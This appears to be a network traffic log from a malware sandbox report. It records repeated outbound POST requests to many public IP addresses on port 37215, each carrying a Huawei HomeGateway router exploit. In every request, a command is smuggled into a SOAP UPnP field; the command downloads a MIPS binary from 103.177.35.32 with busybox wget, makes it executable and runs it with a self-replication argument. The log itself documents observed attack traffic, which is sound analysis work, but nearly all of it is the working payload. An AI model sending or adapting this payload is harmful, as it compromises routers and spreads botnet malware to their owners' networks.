                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2603192.168.2.233433041.33.204.21437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628371000 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2604192.168.2.2351826157.4.183.11037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628376961 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2605192.168.2.235012841.186.133.21937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628376961 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2606192.168.2.235013675.88.201.9637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628402948 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2607192.168.2.2349260197.2.1.3937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628405094 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2608192.168.2.2336614157.191.76.23537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628405094 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2609192.168.2.2356788217.114.154.9837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628407001 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2610192.168.2.236057641.210.205.9737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628424883 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2611192.168.2.2359642157.217.141.3737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628503084 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2612192.168.2.2345310157.196.176.7237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628508091 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
